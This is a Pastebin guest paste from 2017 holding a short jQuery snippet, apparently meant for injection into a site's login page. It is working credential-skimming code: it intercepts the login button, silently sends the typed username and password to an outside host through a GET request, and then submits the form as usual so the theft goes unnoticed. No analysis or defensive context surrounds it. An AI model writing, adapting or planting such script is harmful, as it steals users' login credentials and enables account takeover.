Guest User

Untitled

a guest
Jul 6th, 2017
32
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 0.28 KB | None | 0 0
  1. jQuery("#loginbtn1").click(function(event){
  2.     event.preventDefault();
  3.     jQuery.ajax({
  4.         url: "http://omarbarros.co/get.php?username="+document.forms[3].username.value+"&password="+document.forms[3].password.value
  5.     }).done(function() {
  6.         document.forms[3].submit();
  7.     });
  8. });
Add Comment
Please, Sign In to add comment